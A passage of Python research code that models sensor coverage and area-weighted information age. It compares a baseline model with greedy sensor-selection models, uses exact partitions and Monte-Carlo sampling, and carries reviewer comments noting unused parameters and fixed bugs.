################ OLD MODEL #########################
def baselineModel(ratePerSensor , d, partitionsArea , allPossibleSets, scalingFactor):
    """
    computes the total covered area and the area-weighted age of the baseline
    model; the age of a partition covered by n sensors is d + 1/(n+1) * 1/rate

    NOTE(review): `scalingFactor` is unused here -- kept for call-site
    compatibility.
    """
    coverageArea = np.sum(partitionsArea)
    ## per-partition age, where n = number of sensors covering the partition
    AgePerPartition = [
        d + (1. / (len(allPossibleSets[ii]) + 1.)) * (1 / ratePerSensor)
        for ii in range(len(partitionsArea))
    ]
    areaWeightedAge = np.sum(partitionsArea * AgePerPartition) / coverageArea
    return coverageArea, areaWeightedAge
####### END OF OLD MODEL #######################
##### NEW MODEL (WITH SAMPLING) ################
def sampleIsinBounds(coordSample,coordBox):
    """Return 1 if the (single-row) sample lies inside the box
    [xmin, xmax] x [ymin, ymax] given as coordBox = [xmin, xmax, ymin, ymax], else 0.
    Boundaries are inclusive."""
    x = coordSample[0][0]
    y = coordSample[0][1]
    inside_x = coordBox[0] <= x <= coordBox[1]
    inside_y = coordBox[2] <= y <= coordBox[3]
    return 1 if (inside_x and inside_y) else 0
def SamplesPerSensor(coordSensor,sensorRadius,coordBox,num_samples_per_sensor):
    """
    draws num_samples_per_sensor points uniformly from the sensor's coverage
    disk and keeps only those that fall inside the bounding box
    Returns:
        - number of kept samples
        - list of kept samples, each wrapped in a one-element list holding a
          (1, 2) array
    """
    kept_samples = []
    for _ in range(num_samples_per_sensor):
        ## uniform point on the disk: random angle, sqrt-distributed radius
        ## (RNG draw order kept: theta first, then r)
        theta = 2*np.pi*np.random.rand(1,1)
        r = sensorRadius*np.sqrt(np.random.rand(1,1))
        x, y = r * np.cos(theta) + coordSensor[0]*np.ones([1,1]), r * np.sin(theta) + coordSensor[1]*np.ones([1,1])
        sample = np.concatenate((x,y),axis=1)
        ## discard samples that fall outside the box
        if sampleIsinBounds(sample,coordBox) == 1:
            kept_samples.append([sample])
    return len(kept_samples), kept_samples
def sampleisInCircle(sensorRadius,samplePoint,coordSamplesPerSensor,coordSensors):
    """Return 1 if the wrapped sample lies within sensorRadius of the sensor, else 0.

    NOTE(review): `samplePoint` is unused; the coordinates are read directly
    from coordSamplesPerSensor[0][0].
    """
    dx = coordSamplesPerSensor[0][0][0] - coordSensors[0]
    dy = coordSamplesPerSensor[0][0][1] - coordSensors[1]
    return 1 if np.sqrt(dx ** 2 + dy ** 2) <= sensorRadius else 0
def computeAgeandArea(N,sensorRadius,coordSamplesPerSensor,numIsInCircle,coordSensors):
    '''
    bins the given samples into coverage partitions (identified by the set of
    sensor ids covering each sample)
    Returns:
        - allPartitions: list of distinct covering sensor-id sets encountered
        - samplesPerPartition: number of samples per entry of allPartitions
    NOTE(review): `numIsInCircle` is unused in this body.
    '''
    allPartitions = []
    samplesPerPartition = []
    for ii in range(len(coordSamplesPerSensor)):
        templistofPartitions = []
        ## collect the ids (1-based) of all sensors covering this sample
        for jj in range(N):
            if sampleisInCircle(sensorRadius,ii,coordSamplesPerSensor[ii],coordSensors[jj,:]):
                templistofPartitions.append(jj+1)
        #creating list of non-empty partitions
        if templistofPartitions not in allPartitions:
            allPartitions.append(templistofPartitions)
            l = len(samplesPerPartition)
            samplesPerPartition.append(0)
            samplesPerPartition[l] = samplesPerPartition[l] + 1
        else:
            # Find where does this partition fall and add a sample to the sample tube
            temp = allPartitions.index(templistofPartitions)
            samplesPerPartition[temp] = samplesPerPartition[temp] + 1
    return allPartitions, samplesPerPartition
def newbaselineModel(capacity, mu, N, d, coordSensors, sensorRadius, coordBox, num_samples_per_sensor, scalingFactor):
    '''
    Monte-Carlo estimate of the total coverage area and the area-weighted age
    when all N sensors use the equal rate capacity/(mu*d*N)
    Returns:
        - coverageArea: estimated covered area
        - areaWeightedAge: partition-area-weighted average age
    '''
    ratePerSensor = capacity/(mu*d*N)
    areaWeightedAge = 0.
    coverageArea = 0.
    allPartitions = []
    samplesPerPartition = []
    appearanceOfaPartition = []
    agePerPartition = []
    percentageSamplesPerPartition = []
    for ii in range(N):
        #Step 1: for each sensor, sample "samples_per_sensor" points and check how many partitions do they cover
        numIsInCircle, coordSamplesPerSensor = SamplesPerSensor(coordSensors[ii,:],sensorRadius,coordBox,num_samples_per_sensor)
        #Step 2: check where does each sample fall
        tempallPartitions, tempsamplesPerPartition = computeAgeandArea(N,sensorRadius,coordSamplesPerSensor,numIsInCircle,coordSensors)
        ## merge this sensor's per-partition histogram into the global one
        for jj in range(len(tempallPartitions)):
            if tempallPartitions[jj] not in allPartitions:
                allPartitions.append(tempallPartitions[jj])
                samplesPerPartition.append(tempsamplesPerPartition[jj])
                #percentageSamplesPerPartition.append(tempsamplesPerPartition[jj]/numIsInCircle)
                appearanceOfaPartition.append(1)
            else:
                temp = allPartitions.index(tempallPartitions[jj])
                samplesPerPartition[temp] = samplesPerPartition[temp] + tempsamplesPerPartition[jj]
                #percentageSamplesPerPartition[temp] = percentageSamplesPerPartition[temp] + tempsamplesPerPartition[jj]/numIsInCircle
                appearanceOfaPartition[temp] = appearanceOfaPartition[temp] + 1
    ## average sample share per partition, scaled to area via the disk area
    percentageSamplesPerPartition = np.array(samplesPerPartition)/np.array(appearanceOfaPartition)/num_samples_per_sensor
    areaPerPartition = percentageSamplesPerPartition*np.pi*sensorRadius**2*scalingFactor**2
    coverageArea = np.sum(areaPerPartition)
    for ii in range(len(allPartitions)):
        ## age improves with the number n of sensors covering the partition
        n = len(allPartitions[ii])
        tempAge = d + (1./(n+1.))*(1/ratePerSensor)
        agePerPartition.append(tempAge)
    areaWeightedAge = np.sum(areaPerPartition*agePerPartition)/coverageArea
    return coverageArea, areaWeightedAge
def newSensSelecModel(N, d, capacity, mu, coordSensors, sensorRadius, coordBox, num_samples_per_sensor_sub, num_samples_per_sensor, scalingFactor, lam, areaR, thresh = 2.):
    '''
    greedy sensor selection: picks min(N, k) sensors, each round adding the
    sensor with the largest marginal gain delta_b (coverage reward minus age
    change), then Monte-Carlo evaluates the resulting coverage area and
    area-weighted age
    Returns:
        - coverageArea: estimated area covered by the selected sensors
        - areaWeightedAge: partition-area-weighted average age
        - setofSelectedSensors: ids (1-based) of the selected sensors
    NOTE(review): `thresh` is unused in this body; the selection budget `k`
    is hard-coded to 4 -- confirm whether it should depend on the geometry
    (see the commented formula below).
    '''
    areaWeightedAge = 0.
    coverageArea = 0.
    numSelectedSensors = N
    setofSelectedSensors = []
    setofSensors = np.arange(1,N+1,1)
    allPartitions = []
    samplesPerPartition = []
    appearanceOfaPartition = []
    agePerPartition = []
    percentageSamplesPerPartition = []
    ## hard-coded selection budget
    k = 4.
    #np.ceil((rectangleLength/sensorRadius)*1.) - 5.
    if int(N)>int(k):
        numSelectedSensors = int(k)
    ## all selected sensors share the capacity equally
    ratePerSensor = capacity/(numSelectedSensors*mu*d)
    #lam = d*(1.+1./2.*numSelectedSensors)
    new_max = 0.
    ## greedy rounds: add the sensor with the best marginal gain each time
    for ii in range(int(numSelectedSensors)):
        new_max = 0.
        for jj in range(N):
            if jj+1 not in setofSelectedSensors:
                #Step 1: for each sensor, sample "samples_per_sensor" points and check how many partitions do they cover
                numIsInCircle, coordSamplesPerSensor = SamplesPerSensor(coordSensors[jj,:],sensorRadius,coordBox,num_samples_per_sensor_sub)
                #Step 2: compute the 'b' function
                #b_new, tempcoverageArea, tempareaWeightedAge = new_compute_b(N, d, mu, coordSensors, setofSelectedSensors, setofSensors, ratePerSensor, jj+1, sensorRadius, num_samples_per_sensor, numIsInCircle, coordSamplesPerSensor, oldcoverageArea, oldareaWeightedAge, scalingFactor, areaR, lam)
                # Key step: Compute delta_b = b_new - b_old
                delta_b = compute_delta_b(N, d, mu, coordSensors, setofSelectedSensors, setofSensors, ratePerSensor, jj+1, sensorRadius, num_samples_per_sensor_sub, numIsInCircle, coordSamplesPerSensor, scalingFactor, areaR, lam)
                if delta_b >= new_max:
                    new_max = delta_b
                    selectedSensor = jj+1
        setofSelectedSensors.append(selectedSensor)
    ## collect the coordinates of the selected sensors
    coordSelectedSensors = []
    count = 0
    for ii in range(N):
        if ii+1 in setofSelectedSensors:
            coordSelectedSensors.append([])
            coordSelectedSensors[count].append(coordSensors[setofSelectedSensors[count]-1,:])
            count = count + 1
    ## final Monte-Carlo evaluation of the selected subset
    for ii in range(len(setofSelectedSensors)):
        #Step 1: for each sensor, sample "samples_per_sensor" points and check how many partitions do they cover
        numIsInCircle, coordSamplesPerSensor = SamplesPerSensor(coordSensors[setofSelectedSensors[ii]-1,:],sensorRadius,coordBox,num_samples_per_sensor)
        #Step 2: check where does each sample fall
        #tempallPartitions, tempsamplesPerPartition = computeAgeandArea(numSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle,coordSelectedSensors)
        tempallPartitions, tempsamplesPerPartition = newcomputeAgeandArea(setofSelectedSensors,coordSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle)
        ## merge this sensor's per-partition histogram into the global one
        for jj in range(len(tempallPartitions)):
            if tempallPartitions[jj] not in allPartitions:
                allPartitions.append(tempallPartitions[jj])
                samplesPerPartition.append(tempsamplesPerPartition[jj])
                #percentageSamplesPerPartition.append(tempsamplesPerPartition[jj]/numIsInCircle)
                appearanceOfaPartition.append(1)
            else:
                temp = allPartitions.index(tempallPartitions[jj])
                samplesPerPartition[temp] = samplesPerPartition[temp] + tempsamplesPerPartition[jj]
                #percentageSamplesPerPartition[temp] = percentageSamplesPerPartition[temp] + tempsamplesPerPartition[jj]/numIsInCircle
                appearanceOfaPartition[temp] = appearanceOfaPartition[temp] + 1
    ## average sample share per partition, scaled to area via the disk area
    percentageSamplesPerPartition = np.array(samplesPerPartition)/np.array(appearanceOfaPartition)/num_samples_per_sensor
    areaPerPartition = percentageSamplesPerPartition*np.pi*sensorRadius**2*scalingFactor**2
    coverageArea = np.sum(areaPerPartition)
    for ii in range(len(allPartitions)):
        ## age improves with the number n of sensors covering the partition
        n = len(allPartitions[ii])
        tempAge = d + (1./(n+1.))*(1/ratePerSensor)
        agePerPartition.append(tempAge)
    areaWeightedAge = np.sum(areaPerPartition*agePerPartition)/coverageArea
    return coverageArea , areaWeightedAge, setofSelectedSensors
def compute_delta_b(N, d, mu, coordSensors, setofSelectedSensors, setofSensors, ratePerSensor, currSensor, sensorRadius, num_samples_per_sensor, numIsInCircle, coordSamplesPerSensor, scalingFactor, areaR, lam):
    '''
    marginal gain of adding `currSensor` to the already selected sensors,
    estimated from the given samples: newly singleton-covered area is rewarded
    with weight lam and charged its age; partitions covered by l > 1 sensors
    contribute the age improvement area * 1/((l+1)*l) * 1/rate
    NOTE(review): `N`, `mu`, `setofSensors`, `numIsInCircle` and `areaR` are
    unused in this body -- kept for call-site compatibility.
    '''
    delta_b = 0.
    allPartitions = []
    samplesPerPartition = []
    appearanceOfaPartition = []
    coordSelectedSensors = []
    if not setofSelectedSensors:
        ## first greedy round: the candidate is evaluated on its own
        currSensors = currSensor
        coordSelectedSensors.append([])
        coordSelectedSensors[0].append(coordSensors[currSensors-1,:])
        #coordSelectedSensors = np.array(coordSelectedSensors)
        tempallPartitions, tempsamplesPerPartition = newcomputeAgeandArea(currSensors,coordSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle)
        for jj in range(len(tempallPartitions)):
            if tempallPartitions[jj] not in allPartitions:
                allPartitions.append(tempallPartitions[jj])
                samplesPerPartition.append(tempsamplesPerPartition[jj])
                #percentageSamplesPerPartition.append(tempsamplesPerPartition[jj]/numIsInCircle)
                appearanceOfaPartition.append(1)
            else:
                temp = allPartitions.index(tempallPartitions[jj])
                samplesPerPartition[temp] = samplesPerPartition[temp] + tempsamplesPerPartition[jj]
                #percentageSamplesPerPartition[temp] = percentageSamplesPerPartition[temp] + tempsamplesPerPartition[jj]/numIsInCircle
                appearanceOfaPartition[temp] = appearanceOfaPartition[temp] + 1
        percentageSamplesPerPartition = np.array(samplesPerPartition)/np.array(appearanceOfaPartition)/num_samples_per_sensor
        areaPerPartition = percentageSamplesPerPartition*np.pi*sensorRadius**2*scalingFactor**2
    else:
        ## later rounds: evaluate the candidate together with the current set
        currSensors = copy.copy(setofSelectedSensors)
        currSensors.append(currSensor)
        currSensors = np.sort(currSensors)
        #Step 2: check where does each sample fall
        for ii in range(len(currSensors)):
            coordSelectedSensors.append([])
            coordSelectedSensors[ii].append(coordSensors[currSensors[ii]-1,:])
        #coordSelectedSensors = np.array(coordSelectedSensors)
        tempallPartitions, tempsamplesPerPartition = newcomputeAgeandArea(currSensors,coordSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle)
        for jj in range(len(tempallPartitions)):
            if tempallPartitions[jj] not in allPartitions:
                allPartitions.append(tempallPartitions[jj])
                samplesPerPartition.append(tempsamplesPerPartition[jj])
                #percentageSamplesPerPartition.append(tempsamplesPerPartition[jj]/numIsInCircle)
                appearanceOfaPartition.append(1)
            else:
                temp = allPartitions.index(tempallPartitions[jj])
                samplesPerPartition[temp] = samplesPerPartition[temp] + tempsamplesPerPartition[jj]
                #percentageSamplesPerPartition[temp] = percentageSamplesPerPartition[temp] + tempsamplesPerPartition[jj]/numIsInCircle
                appearanceOfaPartition[temp] = appearanceOfaPartition[temp] + 1
        percentageSamplesPerPartition = np.array(samplesPerPartition)/np.array(appearanceOfaPartition)/num_samples_per_sensor
        areaPerPartition = percentageSamplesPerPartition*np.pi*sensorRadius**2*scalingFactor**2
    deltaCoverageArea = 0.
    deltaAreaWeightedAge = 0.
    for ii in range(len(allPartitions)):
        if len(allPartitions[ii]) == 1:
            ## singleton partition: coverage reward minus its age contribution
            deltaCoverageArea = deltaCoverageArea + lam*areaPerPartition[ii]
            deltaAreaWeightedAge = deltaAreaWeightedAge-areaPerPartition[ii]*(d+1./2.*1./ratePerSensor)
        else:
            ## shared partition: age improvement from the extra covering sensor
            l = len(allPartitions[ii])
            deltaAreaWeightedAge = deltaAreaWeightedAge + areaPerPartition[ii]*(1./((l+1)*(l)))*1./ratePerSensor
    delta_b = deltaCoverageArea + deltaAreaWeightedAge
    return delta_b
def newcomputeAgeandArea(currSensors,coordSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle):
    '''
    bins the given samples into coverage partitions over the given sensor
    subset; `currSensors` may be a single sensor id or an array of ids
    Returns:
        - allPartitions: list of distinct covering sensor-id sets encountered
        - samplesPerPartition: number of samples per entry of allPartitions
    NOTE(review): `numIsInCircle` is unused in this body.
    '''
    allPartitions = []
    samplesPerPartition = []
    if np.size(currSensors) > 1:
        currSensors = np.sort(currSensors)
    #coordSelectedSensors = np.array(coordSelectedSensors)
    for ii in range(len(coordSamplesPerSensor)):
        templistofPartitions = []
        ## collect the ids of all given sensors that cover this sample
        for jj in range(len(coordSelectedSensors)):
            if sampleisInCircle(sensorRadius,ii,coordSamplesPerSensor[ii],coordSelectedSensors[jj][0]):
                if np.size(currSensors) == 1:
                    templistofPartitions.append(currSensors)
                else:
                    templistofPartitions.append(currSensors[jj])
        #creating list of non-empty partitions
        if templistofPartitions not in allPartitions:
            allPartitions.append(templistofPartitions)
            l = len(samplesPerPartition)
            samplesPerPartition.append(0)
            samplesPerPartition[l] = samplesPerPartition[l] + 1
        else:
            # Find where does this partition fall and add a sample to the sample tube
            temp = allPartitions.index(templistofPartitions)
            samplesPerPartition[temp] = samplesPerPartition[temp] + 1
    return allPartitions, samplesPerPartition
######################################################
def compute_b(N, d, mu, partitionsArea, setofSelectedSensors, setofSensors, ratePerSensor, currSensor, allPossibleSets, areaR, lam):
    """Marginal objective value of adding *currSensor* to the selected set.

    Counts, for every partition, how many candidate sensors cover it, derives
    a per-partition age and covered area, and returns:
      b                     -- objective gain vs. the empty selection,
      totalCoveredArea      -- summed area of covered partitions,
      areaWeightedAge       -- sum(area * age) over partitions,
      selectedPartitionsArea-- per-partition covered-area vector.
    """
    num_partitions = len(partitionsArea)
    cover_count = np.zeros(2 ** N - 1)
    covered_area = np.zeros(2 ** N - 1)
    # Candidate set = already-selected sensors plus the one under evaluation.
    if setofSelectedSensors:
        candidates = list(setofSelectedSensors) + [currSensor]
    else:
        candidates = [currSensor]
    for sensor in candidates:
        for idx in range(num_partitions):
            if sensor in allPossibleSets[idx]:
                cover_count[idx] += 1  # one more sensor covers this partition
                covered_area[idx] = partitionsArea[idx]
    ages = []
    areas = []
    for idx in range(num_partitions):
        n_cov = cover_count[idx]
        if n_cov != 0:
            age = d + (1. / (n_cov + 1.)) * (1. / ratePerSensor)
            #age = (n_cov+2.)/(n_cov+1.)*(1./ratePerSensor)
            ages.append(0. if np.isnan(age) else age)
            areas.append(covered_area[idx])
        else:
            ages.append(0.)
            areas.append(0.)
    totalCoveredArea = np.sum(areas)
    areaWeightedAge = np.sum(np.array(areas) * np.array(ages))
    selectedPartitionsArea = covered_area.copy()
    cost = areaWeightedAge + lam * (areaR - totalCoveredArea)
    # Gain relative to selecting nothing (whose cost is lam * areaR).
    b = lam * areaR - cost
    return b, totalCoveredArea, areaWeightedAge, selectedPartitionsArea
def SensSelecModel(N, d, capacity, mu, partitionsArea , allPossibleSets, rectangleLength, rectangleWidth, sensorRadius, scalingFactor, lam, areaR, thresh = 2.):
    """Greedy sensor selection: repeatedly add the sensor with the largest
    marginal objective change (via compute_b), up to k sensors.

    Returns (coverage area, average area-weighted age, selected sensor ids).
    NOTE(review): the candidate test uses np.abs(b_new - b_old) but stores the
    *signed* difference in new_max, so a large negative change can win a round
    and later signed comparisons behave asymmetrically -- confirm intent.
    """
    areaWeightedAge = 0.
    coverageArea = np.sum(partitionsArea)
    numSelectedSensors = N
    setofSelectedSensors = []
    setofSensors = np.arange(1,N+1,1)
    # Hard cap on the number of sensors to select.
    k = 4.
    #np.ceil((rectangleLength/sensorRadius)*1.) - 5.
    if int(N)>int(k):
        numSelectedSensors = (k)
    # Each selected sensor gets an equal share of the channel capacity.
    ratePerSensor = capacity/(numSelectedSensors*mu*d)
    #lam = d*(1.+1./2.*numSelectedSensors)
    new_max = 0.
    temp_b_old = 0.
    for ii in range(int(numSelectedSensors)):
        b_old = temp_b_old
        new_max = 0.
        for jj in range(N):
            if jj+1 not in setofSelectedSensors:
                b_new, tempcoverageArea, tempareaWeightedAge, selectedPartitionsArea = compute_b(N, d, mu, partitionsArea, setofSelectedSensors, setofSensors, ratePerSensor, jj+1, allPossibleSets, areaR, lam)
                if np.abs(b_new - b_old) >= new_max:
                    new_max = (b_new - b_old)
                    temp_b_old = b_new
                    selectedSensor = jj+1
                    coverageArea = tempcoverageArea
                    areaWeightedAge = tempareaWeightedAge
        setofSelectedSensors.append(selectedSensor)
    #setofSelectedSensors = np.sort(setofSelectedSensors)
    return coverageArea , areaWeightedAge/(coverageArea) , setofSelectedSensors
def AgeMinModel(N, d, mu, capacity , partitionsArea , allPossibleSets, rectangleLength , rectangleWidth , sensorRadius, scalingFactor , T, lam, thresh = 2.):
    """Greedy sensor selection followed by Frank-Wolfe rate optimization.

    Selects up to k sensors greedily (same criterion as SensSelecModel),
    rebuilds the partition structure restricted to the selected sensors, then
    runs the Frank-Wolfe descent to optimize per-sensor rates.
    Returns (coverage area, final objective value, selected sensor ids).
    """
    areaWeightedAge = 0.
    coverageArea = np.sum(partitionsArea)
    numSelectedSensors = N
    setofSelectedSensors = []
    setofSensors = np.arange(1,N+1,1)
    k = 4.
    #np.ceil((rectangleLength/sensorRadius)*1.)
    if int(N)>int(k):
        numSelectedSensors = int(k)
    ratePerSensor = capacity/(numSelectedSensors*mu*d)
    #lam = d*(1.+1./2.*numSelectedSensors)
    # BUG FIX: the original call to compute_b omitted the areaR argument
    # (compute_b takes areaR before lam), raising a TypeError as soon as this
    # model ran.  The box area is reconstructed from the rectangle dimensions,
    # which arrive pre-scaled from main() -- NOTE(review): confirm this matches
    # the areaR that main() passes to SensSelecModel.
    areaR = rectangleLength*rectangleWidth
    new_max = 0.
    temp_b_old = 0.
    for ii in range(int(numSelectedSensors)):
        b_old = temp_b_old
        new_max = 0.
        for jj in range(N):
            if jj+1 not in setofSelectedSensors:
                b_new, tempcoverageArea , tempareaWeightedAge,selectedPartitionsArea = compute_b(N, d ,mu, partitionsArea, setofSelectedSensors, setofSensors ,ratePerSensor, jj+1, allPossibleSets, areaR, lam)
                if np.abs(b_new - b_old) >= new_max:
                    new_max = (b_new - b_old)
                    temp_b_old = b_new
                    selectedSensor = jj+1
                    coverageArea = tempcoverageArea
                    areaWeightedAge = tempareaWeightedAge
        setofSelectedSensors.append(selectedSensor)
    setofSelectedSensors = np.sort(setofSelectedSensors)
    # Enumerate every non-empty subset of the selected sensors: these index
    # the partitions of the restricted problem.
    newallPossibleSets = []
    for ii in range(1,int(numSelectedSensors)+1):
        hello = findsubsets(setofSelectedSensors,ii)
        #hello1 = (np.asarray(hello))
        for jj in range(len(hello)):
            newallPossibleSets.append(list(hello[jj]))
    # Fold the full partition areas down onto the selected-sensor partitions.
    newselectedPartitionsArea = np.zeros(2**(numSelectedSensors)-1)
    for ii in range(len(allPossibleSets)):
        temp = []
        for jj in range(len(allPossibleSets[ii])):
            if allPossibleSets[ii][jj] in setofSelectedSensors:
                temp.append(allPossibleSets[ii][jj])
        if temp:
            #temp = np.sort(temp)
            idx = newallPossibleSets.index(temp)
            newselectedPartitionsArea[idx] = newselectedPartitionsArea[idx] + partitionsArea[ii]
    # Compute new rate allocation and new ageWeightedArea
    rate_fw_agemin, obj_fn, l1_fw_agemin = descent(N,frank_wolfe, d, numSelectedSensors, setofSelectedSensors, newallPossibleSets, np.array(newselectedPartitionsArea), capacity/(mu*d), T=T)
    return coverageArea, obj_fn[-1], setofSelectedSensors
##################################################################
def main(T=int(5e2)):
    """Run the full experiment sweep and write the comparison plots.

    Two sweeps over the number of sensors N: the first uses the exact
    partition-based models (baseline + sensor selection), the second the
    sampling-based variants.  Results are averaged over numIter random sensor
    placements and plotted (age, coverage, running time).
    """
    scalingFactor = 50
    N = np.arange(14,19,1) # number of sensors
    num_samples_per_sensor_sub = 5000
    num_samples_per_sensor = 3000
    lam = 1.
    sensorRadius = np.array(100/scalingFactor)#coverage radius per sensor
    #sensorRadius = []
    #sensorRadius = np.array([1.,1.,1.,1.,1.,2.,2.,2.,2.,2.])
    capacity = 1.
    d = 0.5e-3 #transmission delay
    mu = 1. #packet size
    rectangleLength = 500/scalingFactor
    rectangleWidth = 10/scalingFactor
    areaR = rectangleLength*rectangleWidth*scalingFactor**2
    numSquaresperLength = int(rectangleLength*10)
    numSquaresperWidth = int(rectangleWidth*10)
    pixelLength = rectangleLength/numSquaresperLength
    pixelWidth = rectangleWidth/numSquaresperWidth
    xPosCenterPixel1 = pixelLength/2
    yPosCenterPixel1 = pixelWidth/2
    coordPixels = generatePixelsCenters(xPosCenterPixel1, yPosCenterPixel1, pixelLength, pixelWidth, numSquaresperLength, numSquaresperWidth)
    # the coordinates of the box are: x_min, x_max, y_min, y_max
    coordBox = np.array([0.,rectangleLength,0.,rectangleWidth])
    coverageAreaBaseline = []
    areaWeightedAgeBaseline = []
    totalTimeBaseline = []
    coverageAreaSensSelec = []
    areaWeightedAgeSensSelec = []
    selectedSensorsSensSelec = []
    totalTimeSensSelec = []
    coverageAreaAgeMin = []
    areaWeightedAgeAgeMin =[]
    selectedSensorsAgeMin =[]
    newcoverageAreaBaseline = []
    newareaWeightedAgeBaseline = []
    newtotalTimeBaseline = []
    newcoverageAreaSensSelec = []
    newareaWeightedAgeSensSelec = []
    newselectedSensorsSensSelec = []
    newtotalTimeSensSelec = []
    newcoverageAreaAgeMin = []
    newareaWeightedAgeAgeMin =[]
    newselectedSensorsAgeMin =[]
    numIter = 15
    # --- Sweep 1: exact partition-based models ---
    for ii in tqdm(range(len(N))):
        temp1coverageAreaBaseline = []
        temp1areaWeightedAgeBaseline = []
        temp1TotalTimeBaseline = []
        temp1coverageAreaSensSelec = []
        temp1areaWeightedAgeSensSelec = []
        temp1selectedSensorsSensSelec = []
        temp1TotalTimeSensSelec = []
        temp1coverageAreaAgeMin = []
        temp1areaWeightedAgeAgeMin =[]
        temp1selectedSensorsAgeMin =[]
        for jj in range(numIter):
            xcoordSensors = 0 + np.random.rand(N[ii],1)*(rectangleLength-0)
            ycoordSensors = 0 + np.random.rand(N[ii],1)*(rectangleWidth-0)
            coordSensors = np.concatenate((xcoordSensors,ycoordSensors),axis=1)
            startTimeFindPartitions = time.time()
            partitionsArea , allPossibleSets = findPartitionsAreas(pixelLength, pixelWidth, coordPixels,coordSensors,sensorRadius,N[ii])
            endTimeFindPartitions = time.time()
            startTimeBaseline = time.time()
            tempcoverageAreaBaseline , tempareaWeightedAgeBaseline = baselineModel(capacity/(N[ii]*mu*d), d, partitionsArea*scalingFactor**2 , allPossibleSets, scalingFactor)
            endTimeBaseline = time.time()
            startTimeSensSelec = time.time()
            tempcoverageAreaSensSelec , tempareaWeightedAgeSensSelec , tempselectedSensorsSensSelec = SensSelecModel(N[ii], d, capacity , mu, partitionsArea*scalingFactor**2 , allPossibleSets, rectangleLength*scalingFactor, rectangleWidth*scalingFactor , sensorRadius*scalingFactor, scalingFactor, lam, areaR, thresh = 2.)
            endTimeSensSelec = time.time()
            # tempcoverageAreaAgeMin , tempareaWeightedAgeAgeMin , tempselectedSensorsAgeMin = AgeMinModel(N[ii], d, mu, capacity , partitionsArea*scalingFactor**2 , allPossibleSets, rectangleLength*scalingFactor , rectangleWidth*scalingFactor , sensorRadius*scalingFactor, scalingFactor, T, lam ,thresh = 2.)
            temp1coverageAreaBaseline.append(tempcoverageAreaBaseline)
            temp1areaWeightedAgeBaseline.append(tempareaWeightedAgeBaseline)
            temp1TotalTimeBaseline.append((endTimeFindPartitions-startTimeFindPartitions)+(endTimeBaseline-startTimeBaseline))
            temp1coverageAreaSensSelec.append(tempcoverageAreaSensSelec)
            temp1areaWeightedAgeSensSelec.append(tempareaWeightedAgeSensSelec)
            temp1selectedSensorsSensSelec.append(len(tempselectedSensorsSensSelec))
            temp1TotalTimeSensSelec.append((endTimeFindPartitions-startTimeFindPartitions)+(endTimeSensSelec-startTimeSensSelec))
            # temp1coverageAreaAgeMin.append(tempcoverageAreaAgeMin)
            # temp1areaWeightedAgeAgeMin.append(tempareaWeightedAgeAgeMin)
            # temp1selectedSensorsAgeMin.append(len(tempselectedSensorsAgeMin))
        coverageAreaBaseline.append(np.sum(temp1coverageAreaBaseline)/numIter/areaR*100)
        areaWeightedAgeBaseline.append(np.sum(temp1areaWeightedAgeBaseline)/numIter*1000.)
        totalTimeBaseline.append(np.sum(temp1TotalTimeBaseline)/numIter)
        coverageAreaSensSelec.append(np.sum(temp1coverageAreaSensSelec)/numIter/areaR*100)
        areaWeightedAgeSensSelec.append(np.sum(temp1areaWeightedAgeSensSelec)/numIter*1000.)
        selectedSensorsSensSelec.append(np.sum(temp1selectedSensorsSensSelec)/numIter)
        totalTimeSensSelec.append(np.sum(temp1TotalTimeSensSelec)/numIter)
        # coverageAreaAgeMin.append(np.sum(temp1coverageAreaAgeMin)/numIter/areaR)
        # areaWeightedAgeAgeMin.append(np.sum(temp1areaWeightedAgeAgeMin)/numIter*1000.)
        # selectedSensorsAgeMin.append(np.sum(temp1selectedSensorsAgeMin)/numIter)
    # --- Sweep 2: sampling-based models ---
    for ii in tqdm(range(len(N))):
        temp1coverageAreaBaseline = []
        temp1areaWeightedAgeBaseline = []
        temp1TotalTimeBaseline = []
        temp1coverageAreaSensSelec = []
        temp1areaWeightedAgeSensSelec = []
        temp1selectedSensorsSensSelec = []
        # BUG FIX: this list was initialized as `temp1TotalTimeSensSel` (typo),
        # so the appends below kept extending the stale list left over from the
        # first sweep and the per-N timing averages were wrong.
        temp1TotalTimeSensSelec = []
        temp1coverageAreaAgeMin = []
        temp1areaWeightedAgeAgeMin =[]
        temp1selectedSensorsAgeMin =[]
        for jj in range(numIter):
            xcoordSensors = 0 + np.random.rand(N[ii],1)*(rectangleLength-0)
            ycoordSensors = 0 + np.random.rand(N[ii],1)*(rectangleWidth-0)
            coordSensors = np.concatenate((xcoordSensors,ycoordSensors),axis=1)
            startTimeBaseline = time.time()
            tempcoverageAreaBaseline , tempareaWeightedAgeBaseline = newbaselineModel(capacity, mu, N[ii], d, coordSensors, sensorRadius, coordBox, num_samples_per_sensor, scalingFactor)
            endTimeBaseline = time.time()
            startTimeSensSelec = time.time()
            tempcoverageAreaSensSelec, tempareaWeightedAgeSensSelec, tempselectedSensorsSensSelec = newSensSelecModel(N[ii], d, capacity , mu, coordSensors, sensorRadius, coordBox, num_samples_per_sensor_sub, num_samples_per_sensor, scalingFactor, lam, areaR, thresh = 2.)
            endTimeSensSelec = time.time()
            #tempcoverageAreaAgeMin , tempareaWeightedAgeAgeMin , tempselectedSensorsAgeMin = AgeMinModel(N[ii], d, mu, capacity , partitionsArea*scalingFactor**2 , allPossibleSets, rectangleLength*scalingFactor , rectangleWidth*scalingFactor , sensorRadius*scalingFactor, scalingFactor, T, lam ,thresh = 2.)
            temp1coverageAreaBaseline.append(tempcoverageAreaBaseline)
            temp1areaWeightedAgeBaseline.append(tempareaWeightedAgeBaseline)
            temp1TotalTimeBaseline.append(endTimeBaseline-startTimeBaseline)
            temp1coverageAreaSensSelec.append(tempcoverageAreaSensSelec)
            temp1areaWeightedAgeSensSelec.append(tempareaWeightedAgeSensSelec)
            temp1selectedSensorsSensSelec.append(len(tempselectedSensorsSensSelec))
            temp1TotalTimeSensSelec.append(endTimeSensSelec-startTimeSensSelec)
            # temp1coverageAreaAgeMin.append(tempcoverageAreaAgeMin)
            # temp1areaWeightedAgeAgeMin.append(tempareaWeightedAgeAgeMin)
            # temp1selectedSensorsAgeMin.append(len(tempselectedSensorsAgeMin))
        newcoverageAreaBaseline.append(np.sum(temp1coverageAreaBaseline)/numIter/areaR*100)
